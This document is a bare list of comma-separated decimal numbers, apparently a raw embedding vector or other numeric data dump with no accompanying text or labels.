-0.021144570782780647, 0.030074268579483032, 0.014014250598847866, -0.00150166021194309, -0.033180251717567444, 0.021488020196557045, -0.026938421651721, 0.006562880240380764, 0.012132742442190647, -0.007107920479029417, 0.021876268088817596, -0.013095895759761333, -0.014036649838089943, 0.013424413278698921, 0.017695138230919838, -0.010557352565228939, 0.004778434056788683, 0.0009706193814054132, -0.05133830010890961, -0.023250067606568336, -0.005517597775906324, 0.003527828259393573, 0.018352173268795013, 0.010938134044408798, 0.026191791519522667, 0.009758458472788334, -0.02357858419418335, 0.02565421722829342, 0.0016463198699057102, -0.013275086879730225, 0.010124307125806808, 0.022727426141500473, 0.060506921261548996, 0.023279933258891106, 0.012632984668016434, 0.03246348723769188, -0.010938134044408798, 0.021876268088817596, -0.003740617772564292, 0.01696344092488289, -0.0007974944892339408, 0.024519339203834534, -0.003990739118307829, -0.009780856780707836, -0.021712008863687515, -0.02789410762488842, -0.022249583154916763, -0.04856083542108536, 0.032224565744400024, 0.010333362966775894, -0.015276055783033371, -0.024399878457188606, 0.049217868596315384, -0.020368074998259544, 0.008526518009603024, -0.009452339261770248, -0.01805352047085762, 0.02380257472395897, -0.04891921579837799, 0.007742556277662516, -0.012483658269047737, -0.005450401455163956, -0.0026860025245696306, 0.03306078910827637, 0.01222233846783638, 0.01760554313659668, 0.04037776589393616, -0.001469928422011435, 0.0012375396909192204, -0.010967998765408993, 0.0019785703625530005, -0.025609418749809265, -0.016351204365491867, 0.02508677914738655, -0.0033225049264729023, -0.006835400592535734, 0.002643071347847581, -0.0019011073745787144, -0.02677416242659092, 0.022070391103625298, -0.019546780735254288, -0.007697758264839649, -0.005267476662993431, -0.004427517764270306, -0.005670657381415367, -0.022383976727724075, -0.005846115294843912, -0.010826139710843563, 0.015216325409710407, -0.0018059120047837496, -0.014141177758574486, -0.014529425650835037, 0.021831469610333443, -0.015246191062033176, -0.001608988270163536, -0.013364682905375957, -0.006014107260853052, 0.0375107079744339, 0.0015725900884717703, 0.01706796884536743, -0.04390186071395874, -0.02195093035697937, -0.026505375280976295, 0.01945718564093113, -0.012311933562159538, -0.005595994181931019, 0.003919809125363827, 0.03434499353170395, 0.005274943076074123, -0.026639768853783607, -0.030477449297904968, -0.004184863064438105, -0.03246348723769188, -0.016724519431591034, -0.04879975691437721, -0.022413842380046844, -0.040885474532842636, 0.02769998461008072, -0.02623658813536167, 0.03252321481704712, -0.003755550365895033, 0.011580236256122589, -0.0011834090109914541, 0.03628623113036156, -0.023922035470604897, -0.017486082389950752, -0.005136816296726465, -0.004393919371068478, 0.006928729359060526, -0.003466231282800436, 0.0007601630059070885, 0.011475707404315472, 0.016112282872200012, 0.01043042540550232, 0.01687384583055973, -0.010841071605682373, 0.013752929866313934, -0.03464364632964134, -0.022070391103625298, 0.01330495160073042, 0.012028214521706104, 0.0028782598674297333, 0.03016386367380619, -0.005663190968334675, -0.005121883936226368, 0.027401331812143326, -0.004438717383891344, 0.009638996794819832, 0.005734120961278677, -0.0023668180219829082, 0.0013812660472467542, -0.03288159891963005, -0.039123427122831345, 0.007499901577830315, -0.011281583458185196, 0.015455246903002262, -0.03114941716194153, 0.01073654368519783, 0.013835059478878975, 0.013439345173537731, -0.007447637151926756, 0.01155037060379982, 0.005271209869533777, 0.010452824644744396, -0.015768831595778465, -0.00581625010818243, -0.006073837634176016, -0.008250264450907707, 0.018710555508732796, -0.01461902167648077, -0.0058909133076667786, -0.02393696829676628, -0.006185831967741251, -0.0006024372996762395, 0.0073804403655231, -0.0024060162249952555, -0.011005330830812454, 0.016082417219877243, 0.0327322743833065, -0.05256277322769165, 0.019606512039899826, 0.002217492088675499, -0.010393094271421432, -0.0018105785129591823, -0.0017256493447348475, -0.005973042454570532, 0.0071191200986504555, -0.010154171846807003, -0.009205951355397701, 0.01859109476208687, -0.032164834439754486, 0.030537178739905357, 0.0005982375587336719, -0.008347326889634132, -0.032672543078660965, 0.021234165877103806, 0.003343037096783519, 0.030880630016326904, 0.01305109728127718, 0.01382012665271759, -0.00031451802351512015, -0.04509647190570831, 0.00892969872802496, 0.008205466903746128, -0.017530879005789757, 0.015798697248101234, 0.01642586663365364, -0.012528456747531891, -0.01316309254616499, -0.005428002215921879, 0.009638996794819832, -0.01897934265434742, 0.00021045641915407032, -0.01875535398721695, -0.02949189767241478, 0.005058420356363058, -0.011229319497942924, -0.010266167111694813, 0.02133869379758835, 0.0063314251601696014, 0.062358561903238297, -0.000034969129046658054, -0.019696107134222984, 0.006391155533492565, -0.010437891818583012, 0.034554049372673035, -0.01594802364706993, 0.03144806995987892, 0.024310283362865448, 0.011445842683315277, 0.0103034982457757, -0.029133515432476997, 0.01875535398721695, -0.014656352810561657, 0.00969872809946537, 0.004498447757214308, 0.000951953639741987, 0.011602634564042091, 0.019696107134222984, -0.007839618250727654, -0.033628229051828384, 0.013245221227407455, 0.0010210169712081552, -0.004864296410232782, -0.004364054184406996, 0.01693357527256012, -0.0013430012622848153, -0.008071073330938816, -0.027714917436242104, -0.011393578723073006, -0.03792881965637207, -0.03338930755853653, 0.0015688568819314241, 0.03108968585729599, 0.006480751093477011, -0.04285657778382301, -0.009213417768478394, -0.011035195551812649, -0.005536263808608055, 0.012677782215178013, -0.023981764912605286, 0.016216810792684555, -0.03252321481704712, 0.03691340237855911, 0.026505375280976295, 0.0338074192404747, -0.05041247978806496, 0.024653732776641846, -0.00702952453866601, -0.009631531313061714, -0.018038587644696236, 0.008048675023019314, 0.02632618509232998, 0.0038339465390890837, -0.025161441415548325, 0.0005861048121005297, -0.02604246512055397, -0.0017499147215858102, -0.005827449727803469, 0.011244252324104309, 0.021607480943202972, -0.0032907731365412474, 0.0131780244410038, 0.008220399729907513, -0.0027979970909655094, -0.008892366662621498, 0.006170899607241154, 0.01888974756002426, -0.008907299488782883, 0.02099524438381195, -0.009534468874335289, 0.0176354069262743, -0.003972073085606098, 0.0024004164151847363, 0.03344903886318207, 0.00026342051569372416, 0.017306890338659286, -0.01636613719165325, 0.008168135769665241, -0.00971365999430418, 0.010363228619098663, -0.029506830498576164, -0.006827934179455042, -0.025579554960131645, 0.012558321468532085, -0.006898864172399044, -0.0018815083894878626, 0.0057565197348594666, -0.0194870512932539, -0.02096537873148918, 0.0795011967420578, -0.002441480988636613, -0.0025198773946613073, 0.0020103021524846554, 0.00842199008911848, 0.020009692758321762, 0.0034419656731188297, 0.017232228070497513, 0.029671087861061096, -0.0191436018794775, 0.02744613029062748, 0.011251718737185001, -0.019636377692222595, 0.019606512039899826, -0.0036211570259183645, 0.025803543627262115, -0.010370695032179356, -0.00698845973238349, 0.03918315842747688, 0.02514650858938694, 0.027401331812143326, 0.00044354505371302366, 0.005465333815664053, -0.012834575027227402, 0.02699815109372139, 0.018352173268795013, -0.021159503608942032, -0.005267476662993431, -0.01270018145442009, -0.0023388194385915995, -0.020263547077775, 0.013103362172842026, 0.0030966491904109716, -0.014253172092139721, 0.020786188542842865, 0.015843495726585388, 0.021906133741140366, 0.025982733815908432, -0.013125760480761528, -0.01936759054660797, 0.0035968914162367582, -0.0023388194385915995, 0.003772349562495947, 0.00004876429011346772, -0.001198341604322195, -0.0007988944416865706, 0.008459321223199368, -0.0006365023436956108, -0.013558805920183659, -0.0011488774325698614, -0.008914765901863575, -0.019740905612707138, 0.007040723692625761, -0.0015791230835020542, 0.0010266166646033525, 0.0026542707346379757, -0.02198079600930214, 0.017396485432982445, -0.0013915322488173842, -0.03332957625389099, 0.0003765816509258002, 0.01040055975317955, -0.012326866388320923, -0.013402014039456844, -0.0027289337012916803, -0.007372974418103695, -0.025504890829324722, 0.0012664716923609376, 0.0139321219176054, 0.01673945225775242, 0.0058573149144649506, -0.0033878351096063852, -0.004588043317198753, 0.00813080370426178, 0.0017452483298256993, 0.014686218462884426, -0.013700665906071663, -0.0017779134213924408, 0.008056141436100006, -0.022727426141500473, 0.010243767872452736, 0.01897934265434742, 0.0016463198699057102, 0.013737997971475124, -0.037749629467725754, 0.018994275480508804, -0.004826964810490608, 0.012050612829625607, -0.019815567880868912, -0.016097350046038628, 0.01929292641580105, 0.004442450124770403, 0.013275086879730225, -0.0008758906624279916, 0.014335301704704762, 0.00750736752524972, -0.017560744658112526, -0.017515946179628372, -0.01788926124572754, -0.026057397946715355, 0.00761189591139555, 0.007492435164749622, 0.04933733120560646, 0.013372148387134075, -0.011102392338216305, 0.000029121498300810345, 0.011587702669203281, -0.006073837634176016, 0.000886623514816165, 0.009101423434913158, 0.028700469061732292, -0.00421099504455924, 0.011005330830812454, -0.03392688184976578, 0.0026206723414361477, -0.010691746138036251, 0.008041208609938622, 0.0045992424711585045, 0.0019300393760204315, -0.0011358113260939717, -0.018516432493925095, -0.016814114525914192, 0.034076206386089325, -0.037749629467725754, 0.011819157749414444, 0.034076206386089325, -0.006088769994676113, 0.004640307277441025, -0.01735168881714344, 0.013125760480761528, 0.01693357527256012, 0.015455246903002262, 0.020278479903936386, 0.012394063174724579, 0.008586248382925987, 0.018710555508732796, 0.031686991453170776, -0.010161638259887695, -0.012483658269047737, -0.008011342957615852, 0.0017499147215858102, 0.009758458472788334, 0.023922035470604897, 0.002775598084554076, 0.004308057017624378, -0.011961017735302448, 0.012983901426196098, -0.019128669053316116, 0.0067084734328091145, 0.009437407366931438, 0.0021932264789938927, -0.022921551018953323, 0.021264031529426575, 0.00803374219685793, 0.006290360353887081, 0.016186945140361786, -0.0027699985075742006, -0.015261123888194561, -0.017232228070497513, -0.005849848501384258, 0.02929777279496193, -0.008735574781894684, 0.01939745619893074, -0.02335459552705288, 0.0017984457081183791, 0.0152237918227911, 0.016784248873591423, -0.05656471103429794, -0.001057415152899921, 0.011430909857153893, 0.0226527638733387, -0.012744979001581669, -0.03547987341880798, -0.01163250021636486, 0.012901771813631058, 0.03153766319155693, 0.023563653230667114, -0.027909040451049805, 0.006928729359060526, -0.006085036788135767, 0.008138270117342472, -0.008123337291181087, 0.001305669778957963, 0.01888974756002426, 0.022996213287115097, 0.009168620221316814, 0.008250264450907707, -0.005099485162645578, -0.014529425650835037, -0.0038638117257505655, 0.0055549293756484985, 0.05121883749961853, -0.009541935287415981, -0.005969309248030186, 0.008347326889634132, -0.006846599746495485, 0.014992336742579937, -0.003025719430297613, -0.00039291419670917094, -0.030731303617358208, -0.004207261838018894, 0.03064170852303505, 0.009601665660738945, -0.009310480207204819, 0.011796758510172367, -0.026057397946715355, -0.013984385877847672, -0.0017265825299546123, -0.008504118770360947, 0.01198341604322195, 0.004838164430111647, -0.017754869535565376, -0.004640307277441025, -0.011356246657669544, 0.0018712421879172325, -0.012386596761643887, -0.01474594883620739, -0.013357216492295265, -0.01872548833489418, -0.010878403671085835, -0.0023369528353214264, 0.02652030810713768, -0.01648559793829918, 0.016530394554138184, -0.026385914534330368, -0.001724716043099761, 0.018665757030248642, -0.02242877520620823, -0.003384101903066039, 0.014977403916418552, -0.0028334620874375105, -0.016590125858783722, -0.000025869572709780186, 0.03159739449620247, -0.020756322890520096, 0.0068503329530358315, 0.017948992550373077, -0.012073012068867683, 0.00750736752524972, -0.0009556867880746722, -0.005577328614890575, 0.005846115294843912, 0.003346770303323865, -0.03255308046936989, -0.011975950561463833, -0.00025618751533329487, 0.014835543930530548, 0.02702801674604416, -0.01965131051838398, -0.006786869373172522, 0.017515946179628372, -0.00880277156829834, 0.005338406655937433, -0.028775131329894066, 0.0035558268427848816, 0.0015455246903002262, -0.01645573228597641, -0.002977188443765044, 0.00009986180521082133, -0.027968771755695343, 0.00742150517180562, -0.025101710110902786, 0.002889459254220128, -0.0023014878388494253, -0.010251234285533428, 0.023638315498828888, 0.0012356732040643692, 0.003447565482929349, -0.01897934265434742, -0.009191019460558891, 0.005700522568076849, 0.000507708580698818, 0.021114705130457878, -0.0054877325892448425, -0.016351204365491867, -0.016127213835716248, 0.02466866560280323, -0.0072273812256753445, 0.012065545655786991, 0.005316007882356644, -0.0036883538123220205, 0.04163210466504097, 0.005991708021610975, -0.03246348723769188, -0.0037648833822458982, 0.0010116840712726116, -0.001495127216912806, 0.01351400837302208, 0.0280583668500185, -0.009818188846111298, 0.011834090575575829, -0.006271694786846638, 0.014521959237754345, -0.038197606801986694, 0.02943216636776924, 0.0015613905852660537, -0.010923201218247414, 0.01382012665271759, -0.0008880234090611339, 0.0067756702192127705, 0.017232228070497513, 0.007929214276373386, 0.015738965943455696, -0.005230145063251257, 0.0062754275277256966, -0.009661396034061909, -0.002937990240752697, -0.001419530832208693, -0.00969872809946537, -0.003860078752040863, -0.007223648019134998, -0.00007297144475160167, -0.008780372329056263, -0.009332878515124321, -0.010684279724955559, -0.02368311397731304, -0.01693357527256012, 0.002512410981580615, -0.01833724044263363, 0.0044237845577299595, -0.0056893229484558105, 0.000677100382745266, 0.00017814133025240153, 0.007787354290485382, -0.003830213565379381, 0.011333848349750042, -0.024355079978704453, -0.003742484375834465, -0.003660354996100068, -0.0058983792550861835, 0.037301648408174515, 0.0006523682386614382, 0.02329486608505249, -0.02466866560280323, -0.001404598238877952, 0.002557208761572838, -0.006514349486678839, -0.02108483947813511, -0.023981764912605286, 0.007007125299423933, -0.04246833175420761, 0.04202035441994667, -0.015335786156356335, 0.010557352565228939, 0.01706796884536743, -0.039063695818185806, -0.004229660611599684, 0.007376707624644041, -0.013573738746345043, 0.002643071347847581, 0.00248067919164896, -0.003020119620487094, 0.017590610310435295, 0.02239890955388546, 0.017112767323851585, 0.014768347144126892, -0.012334332801401615, 0.02590807154774666, -0.014596622437238693, -0.0073617747984826565, -0.02189120091497898, 0.0002659870369825512, -0.03461378067731857, 0.013349750079214573, -0.018620960414409637, -0.0005277742748148739, -0.024997182190418243, 0.02217492088675499, -0.005092018749564886, 0.006689807400107384, 0.0248926542699337, -0.011430909857153893, 0.010027244687080383, 0.008713175542652607, 0.0021110970992594957, -0.004673905670642853, 0.028192760422825813, -0.03482283651828766, -0.006014107260853052, 0.015410449355840683, 0.011684764176607132, -0.005674390122294426, -0.005808783695101738, 0.02217492088675499, -0.014335301704704762, -0.01432783529162407, -0.011953551322221756, -0.0022790890652686357, -0.008937165141105652, -0.008078539744019508, 0.04993463307619095, 0.020472602918744087, 0.006316492334008217, 0.02051740139722824, -0.01942731998860836, 0.0208011195063591, 0.004386452957987785, 0.02307087555527687, 0.010019778273999691, 0.0004867096431553364, 0.018800150603055954, -0.022159988060593605, -0.0039459411054849625, 0.022996213287115097, 0.016127213835716248, 0.002068165922537446, -0.015888292342424393, -0.019785702228546143, 0.034434590488672256, 0.009168620221316814, 0.026176858693361282, -0.001716316444799304, -0.013192957267165184, -0.024579070508480072, -0.004726169630885124, -0.0033878351096063852, -0.0009678195347078145, 0.01929292641580105, -0.017262091860175133, 0.015664303675293922, -0.0031395803671330214, 0.000005319011961546494, -0.018426835536956787, -0.04010897874832153, 0.020562198013067245, -0.008757973089814186, -0.0031619793735444546, -0.01278231106698513, -0.0014064648421481252, -0.004505913704633713, -0.01741141825914383, 0.008556383661925793, 0.028476480394601822, -0.007313244044780731, -0.023414326831698418, 0.019531847909092903, -0.013939587399363518, -0.02223465032875538, -0.005483999382704496, 0.006286627147346735, 0.013095895759761333, -0.015470179729163647, 0.005909578874707222, -0.0018348440062254667, -0.011513039469718933, -0.004084067884832621, -0.020786188542842865, 0.00880277156829834, -0.013611070811748505, -0.003279573516920209, 0.0397505983710289, -0.018382038921117783, 0.026341117918491364, 0.009653929620981216, -0.01578376442193985, 0.007335642818361521, 0.010310964658856392, 0.009497137740254402, -0.015500045381486416, -0.006058904808014631, 0.008533984422683716, -0.0029977206140756607, -0.0016883177449926734, -0.004569377284497023, 0.012767378240823746, 0.024564137682318687, -0.0067159393802285194, 0.014738482423126698, -0.010796274058520794, -0.03395674750208855, -0.002394816605374217, -0.0025833407416939735, 0.00821293331682682, 0.006058904808014631, -0.0036136906128376722, -0.017710071057081223, -0.0068839313462376595, -0.02368311397731304, 0.023160472512245178, 0.003841412952169776, 0.013573738746345043, 0.02783437818288803, -0.0006029039504937828, 0.02121923305094242, 0.0019029739778488874, 0.017262091860175133, 0.03347890451550484, 0.007339376024901867, 0.008168135769665241, -0.006633810233324766, 0.004132598638534546, -0.021607480943202972, -0.0028278622776269913, -0.002643071347847581, 0.009683795273303986, -0.006137301214039326, 0.0035502270329743624, 0.026311252266168594, 0.017172496765851974, 0.01111732516437769, -0.00020497334480751306, 0.00019692374917212874, -0.006932462565600872, -0.01754581183195114, 0.031776584684848785, -0.015873359516263008, -0.006029039621353149, -0.004420051351189613, 0.005252544302493334, 0.0008492919732816517, -0.0012935369741171598, -0.005196547135710716, 0.00210549752227962, -0.0013999318471178412, -0.010923201218247414, 0.02879006415605545, -0.0023070876486599445, 0.025982733815908432, 0.009870452806353569, 0.010445358231663704, 0.008078539744019508, 0.003779815975576639, 0.012401529587805271, -0.018665757030248642, 0.003826480358839035, 0.010415492579340935, 0.00971365999430418, 0.004819498397409916, -0.031298741698265076, -0.026535240933299065, 0.0185612291097641, -0.002447080798447132, -0.001484861015342176, -0.0341956689953804, 0.005342139862477779, -0.00656661344692111, 0.014350234530866146, -0.006928729359060526, 0.006058904808014631, -0.002842794870957732, 0.0007204982684925199, 0.013110828585922718, 0.0017256493447348475, -0.0061746328137815, -0.014462228864431381, -0.021069906651973724, 0.005778918508440256, -0.0194870512932539, -0.008190534077584743, -0.02671443298459053, -0.009900317527353764, -0.004505913704633713, -0.01129651628434658, -0.000858158222399652, 0.007440171204507351, -0.0011236786376684904, -0.020890716463327408, 0.0033878351096063852, 0.003990739118307829, 0.0028185294941067696, -0.012304467149078846, -0.012043146416544914, 0.015029667876660824, -0.01962144486606121, -0.008832636289298534, 0.021398425102233887, 0.008683310821652412, -0.006379955913871527, 0.010520021431148052, -0.038645584136247635, -0.001741515239700675, -0.03291146457195282, 0.006764470599591732, -0.011602634564042091, -0.0022772224619984627, -0.011796758510172367, 0.012438860721886158, 0.000410646665841341, 0.0023220202419906855, 0.005659457761794329, 0.009833120740950108, 0.00496135838329792, -0.03786908835172653, -0.013088429346680641, -0.0041811298578977585, 0.006010374054312706, 0.0017004505498334765, 0.0006085037020966411, -0.003468097886070609, -0.010355762206017971, 0.018546296283602715, 0.004061668645590544, -0.012035680934786797, 0.005092018749564886, -0.008063606917858124, -0.006458352319896221, -0.01257325429469347, 0.013581205159425735, -0.01642586663365364, -0.0015193927101790905, 0.002266023075208068, 0.030477449297904968, 0.0023070876486599445, 0.017978858202695847, -0.011274117976427078, 0.01626160740852356, 0.0027662653010338545, -0.031746719032526016, 0.02262289822101593, 0.00021150636894162744, 0.009347811341285706, -0.0077574891038239, -0.009930183179676533, -0.0060999696142971516, -0.01303616538643837, -0.00821293331682682, 0.011729561723768711, -0.023145539686083794, -0.02121923305094242, 0.00033575031557120383, -0.006980993319302797, 0.0052114794962108135, 0.012812175787985325, 0.006764470599591732, -0.0013234021607786417, 0.03754057362675667, -0.000836225925013423, 0.015380584634840488, -0.0023500188253819942, -0.012334332801401615, -0.015574708580970764, -0.012730047106742859, -0.000252221041591838, 0.0039123427122831345, -0.013506541959941387, 0.01330495160073042, -0.02486278861761093, 0.0032086437568068504, -0.0031470467802137136, 0.005666924174875021, -0.0035483604297041893, -0.016336271539330482, -0.015992820262908936, -0.006409821100533009, -0.0069660609588027, -0.028028501197695732, 0.013275086879730225, -0.02035314217209816, 0.008556383661925793, 0.010109374299645424, 0.017426351085305214, -0.009848053567111492, 0.006611411459743977, -0.0016220543766394258, -0.018740421161055565, -0.03568892925977707, -0.01673945225775242, -0.02610219456255436, 0.003968339879065752, -0.00032408421975560486, 0.015903225168585777, 0.030432650819420815, 0.012035680934786797, 0.019307859241962433, -0.0016304539749398828, -0.00440138578414917, -0.012834575027227402, 0.026953354477882385, -0.01894947700202465, 0.02658003941178322, -0.0038022147491574287, -0.008541450835764408, 0.002348152222111821, 0.01517899427562952, -0.021935997530817986, 0.0009743525297380984, 0.010467756539583206, -0.003738751169294119, -0.017247160896658897, -0.002202559495344758, -0.014559291303157806, 0.009780856780707836, -0.0059991744346916676, 0.015574708580970764, -0.007921747863292694, 0.004140065051615238, 0.013543874025344849, -0.003430766286328435, 0.00009152054553851485, -0.00036864870344288647, 0.013827593065798283, 0.01569416932761669, 0.003201177343726158, -0.017560744658112526, -0.01939745619893074, -0.0449172779917717, -0.016545327380299568, 0.002482545794919133, -0.0032515749335289, -0.004543245304375887, 0.02399669773876667, 0.00798894464969635, 0.003285173326730728, 0.0176354069262743, -0.012087944895029068, 0.010915734805166721, 0.028222626075148582, -0.018859881907701492, 0.010109374299645424, -0.003990739118307829, -0.011266651563346386, 0.0023929502349346876, -0.011542904190719128, 0.014731016010046005, -0.019098803400993347, 0.007257246412336826, -0.0017723137279972434, -0.0015324587002396584, 0.00880277156829834, 0.0011451442260295153, 0.009019293822348118, 0.006036506034433842, 0.014290504157543182, -0.015238724648952484, 0.012528456747531891, -0.018770286813378334, 0.021622413769364357, -0.01891961134970188, -0.029865212738513947, 0.012043146416544914, 0.007802286650985479, -0.019725972786545753, 0.03108968585729599, -0.003723818575963378, -0.00002846527968358714, -0.010632015764713287, -0.006518082693219185, -0.0023089542519301176, -0.005973042454570532, -0.008481720462441444, 0.031179280951619148, 0.026669634506106377, -0.0032758405432105064, 0.0027718651108443737, -0.0006882998277433217, -0.014163576997816563, -0.007914281450212002, -0.0182177796959877, 0.027117611840367317, 0.01236419752240181, -0.010915734805166721, 0.005704255308955908, 0.00043164563248865306, -0.01184155698865652, 0.009870452806353569, -0.008937165141105652, -0.0028969256673008204, 0.004177396651357412, 0.009885385632514954, 0.003512895666062832, 0.0045992424711585045, 0.01185648888349533, -0.015320854261517525, -0.00731697678565979, -0.001446596230380237, 0.011595169082283974, 0.011445842683315277, -0.001566990395076573, -0.02015901915729046, -0.020457670092582703, -0.010885870084166527, -0.007115386892110109, 0.01449209451675415, 0.008414523676037788, 0.03876504674553871, 0.029820414260029793, 0.012035680934786797, -0.027296803891658783, -0.0010284832678735256, -0.012991366907954216, -0.017038103193044662, -0.007787354290485382, -0.003871278138831258, -0.0206069964915514, 0.034076206386089325, 0.00406540185213089, 0.00673460541293025, -0.008414523676037788, 0.007365508005023003, -0.003119048196822405, -0.010206436738371849, -0.01878521777689457, 0.0073804403655231, -0.007178850471973419, -0.0017863130196928978, -0.0002776531327981502, -0.009683795273303986, 0.013954520225524902, -0.011348780244588852, -0.019024139270186424, 0.0066412766464054585, -0.02486278861761093, 0.009624064899981022, -0.00821293331682682, -0.0019953695591539145, 0.014671285636723042, 0.016694653779268265, 0.012349265627563, -0.008705709129571915, 0.009004361927509308, 0.0014204641338437796, -0.00004628524766303599, -0.013730531558394432, 0.011946084909141064, -0.0007769621443003416, 0.012901771813631058, -0.006346357520669699, -0.002990254433825612, 0.015798697248101234, 0.0239668320864439, 0.012797243893146515, -0.004938959609717131, 0.026475511491298676, -0.008825169876217842, 0.0015819229884073138, -0.027117611840367317, -0.006036506034433842, -0.027490928769111633, 0.014723549596965313, 0.003578225849196315, 0.006428487133234739, -0.002465746598318219, 0.0009528869413770735, 0.009549401700496674, -0.026729365810751915, -0.0064732846803963184, -0.008795305155217648, 0.00957180093973875, -0.006779402960091829, 0.016858913004398346, -0.0032534415367990732, 0.005778918508440256, 0.0071265860460698605, -0.0007447637035511434, 0.015119263902306557, -0.01661999151110649, 0.0029641222208738327, -0.026639768853783607, -0.011438376270234585, 0.003135847393423319, -0.02371297776699066, -0.007242314051836729, 0.002215625485405326, 0.011460775509476662, 0.02281702123582363, -0.001034082961268723, -0.010803740471601486, -0.010057110339403152, -0.02018888294696808, -0.011595169082283974, 0.02904391847550869, -0.005924511700868607, -0.005435468629002571, -0.001937505672685802, 0.01236419752240181, -0.008302529342472553, -0.004539512097835541, -0.004434984177350998, -0.02853620983660221, -0.004259525798261166, 0.014417431317269802, -0.012998833321034908, -0.006159699987620115, 0.003729418385773897, 0.007175117265433073, -0.008145736530423164, 0.0060327728278934956, -0.010848538018763065, -0.019725972786545753, 0.02716241031885147, 0.014940072782337666, -0.01782953180372715, 0.006167166400700808, -0.006085036788135767, 0.0025702747516334057, 0.01760554313659668, 0.014253172092139721, 0.00427445862442255, -0.006208231206983328, -0.02009928785264492, 0.004453649744391441, 0.019561713561415672, -0.00416993023827672, 0.03111955150961876, 0.010452824644744396, -0.007339376024901867, 0.006469551473855972, 0.0027065349277108908, 0.0061746328137815, 0.021517885848879814, -0.005696789361536503, 0.006615144666284323, 0.0039459411054849625, -0.006596478633582592, -0.011139724403619766, 0.00813080370426178, -0.00742150517180562, -0.012737512588500977, -0.006465818267315626, -0.0021726940758526325, -0.003658488392829895, 0.001419530832208693, 0.01369319949299097, -0.0011740761110559106, 0.040497228503227234, 0.02405642904341221, -0.033628229051828384, -0.010788807645440102, -0.003692086786031723, 0.01201328169554472, 0.02313060685992241, 0.0054877325892448425, -0.003994472324848175, 0.0191436018794775, 0.0101317735388875, -0.006197031587362289, 0.01517899427562952, 0.00824279896914959, -0.0035670262295752764, 0.012968968600034714, 0.014447296038269997, 0.003692086786031723, -0.005842382088303566, -0.0018563095945864916, -0.02399669773876667, 0.013491610065102577, -0.030537178739905357, -0.019218264147639275, -0.01236419752240181, 0.006346357520669699, -0.011849023401737213, -0.002708401530981064, 0.0007587630534544587, -0.013581205159425735, -0.016888776794075966, -0.02834208682179451, -0.0010648814495652914, 0.013581205159425735, 0.014521959237754345, 0.012543389573693275, 0.009004361927509308, 0.0035520936362445354, -0.00690259737893939, 0.0014745948137715459, -0.006865265779197216, 0.012125276029109955, 0.011371179483830929, 0.018904678523540497, 0.03321011736989021, -0.012513523921370506, -0.0075372327119112015, 0.017680205404758453, 0.008840102702379227, 0.005991708021610975, -0.006865265779197216, -0.00961659848690033, -0.021383492276072502, 0.015470179729163647, 0.0004899761406704783, 0.011729561723768711, 0.013685733079910278, -0.006029039621353149, 0.004367787390947342, -0.017172496765851974, 0.010729077272117138, 0.007802286650985479, -0.01009444147348404, 0.005185347516089678, 0.010318431071937084, -0.006891397759318352, -0.02690855599939823, -0.012102877721190453, -0.017366621643304825, -0.014925139956176281, -0.013476677238941193, -0.007391639985144138, -0.004994956776499748, 0.0075708311051130295, 0.014753415249288082, 0.0013336683623492718, -0.017247160896658897, -0.006484484300017357, 0.022100256755948067, 0.011445842683315277, -0.005640791729092598, -0.006704740226268768, 0.02141335792839527, -0.019113736227154732, 0.014895274303853512, -0.011819157749414444, 0.010773875750601292, -0.002230558078736067, 0.006230629980564117, -0.004154997877776623, 0.001986036542803049, 0.009855519980192184, -0.01351400837302208, 0.02233917824923992, 0.004565644543617964, 0.01712769828736782, 0.002378017408773303, 0.0067495377734303474, 0.008728108368813992, 0.027729850262403488, 0.01432783529162407, 0.015044600702822208, -0.00719004962593317, 0.02553475648164749, -0.0073281764052808285, -0.007518567144870758, -0.007600696291774511, -0.011363713070750237, -0.00038288134965114295, 0.003464364679530263, -0.0165154617279768, 0.0028670604806393385, -0.0031134483870118856, -0.0051106843166053295, 0.02680402807891369, -0.00485682999715209, 0.0004479781782720238, 0.001124611939303577, 0.025923004373908043, -0.015425382182002068, 0.012394063174724579, 0.011415977030992508, -0.0008203600300475955, -0.0046328408643603325, 0.00429685739800334, 0.012580720707774162, -0.0047336360439658165, -0.02074139006435871, -0.019382523372769356, 0.009317946620285511, 0.009273148141801357, -0.017217295244336128, -0.004154997877776623, -0.005062153562903404, -0.006096236407756805, 0.008295062929391861, 0.0025030781980603933, 0.016634922474622726, -0.01111732516437769, -0.005771452095359564, -0.0053122746758162975, 0.03035798855125904, 0.014051582664251328, 0.009176086634397507, 0.01231939997524023, 0.02029341086745262, -0.014171043410897255, 0.0053794714622199535, -0.01198341604322195, -0.008474254049360752, -0.011468241922557354, -0.0011610101209953427, 0.008235332556068897, -0.009773390367627144, -0.026594972237944603, -0.0046253749169409275, -0.01290923822671175, -0.007552165538072586, -0.0033897014800459146, 0.009601665660738945, -0.0004349121591076255, -0.024683598428964615, -0.024370012804865837, 0.0014988603070378304, 0.026893623173236847, -0.01471608318388462, -0.01509686466306448, -0.008265197277069092, 0.02198079600930214, 0.005961842834949493, 0.010408026166260242, 0.0022716226521879435, 0.011826624162495136, -0.009146220982074738, -0.008302529342472553, 0.020487535744905472, -0.009892851114273071, 0.007163917645812035, -0.017695138230919838, -0.024608934298157692, -0.025475025177001953, -0.021323760971426964, 0.0080860061571002, 0.009833120740950108, 0.0008656245190650225, -0.0334191732108593, -0.005028555169701576, 0.02747599594295025, 0.01939745619893074, 0.005707988515496254, 0.012297000735998154, -0.014297970570623875, -0.009370210580527782, 0.026983220130205154, 0.004636574070900679, 0.0008558249683119357, 0.008952097035944462, 0.0008702909690327942, -0.006857799366116524, 0.007066855672746897, -0.007309510838240385, -0.0043901861645281315, 0.0017751135164871812, -0.009765923954546452, -0.0014904607087373734, -0.00867584440857172, -0.012259669601917267, -0.016694653779268265, 0.02077125571668148, 0.007626828737556934, 0.00012424394662957639, -0.003804081352427602, -0.0010723477462306619, 0.006025306414812803, 0.007414038758724928, -0.01833724044263363, -0.035002030432224274, -0.000538040476385504, -0.02130882814526558, 0.011863955296576023, 0.015283522196114063, -0.002497478388249874, -0.017904194071888924, -0.006895130965858698, -0.015500045381486416, -0.010923201218247414, 0.004031803458929062, 0.0014101979322731495, 0.0063314251601696014, 0.01214020885527134, 0.00375368376262486, 0.017172496765851974, 0.004300590604543686, -0.026445645838975906, -0.003481163876131177, -0.0008721575140953064, 0.009176086634397507, 0.009116356261074543, 0.01594802364706993, -0.010340829379856586, 0.00652554864063859, 0.0027793312910944223, -0.01920333132147789, 0.006249295547604561, 0.03798855096101761, -0.008780372329056263, 0.004841897636651993, -0.0049016280099749565, 0.0015651237918063998, 0.01805352047085762, -0.003957140725106001, 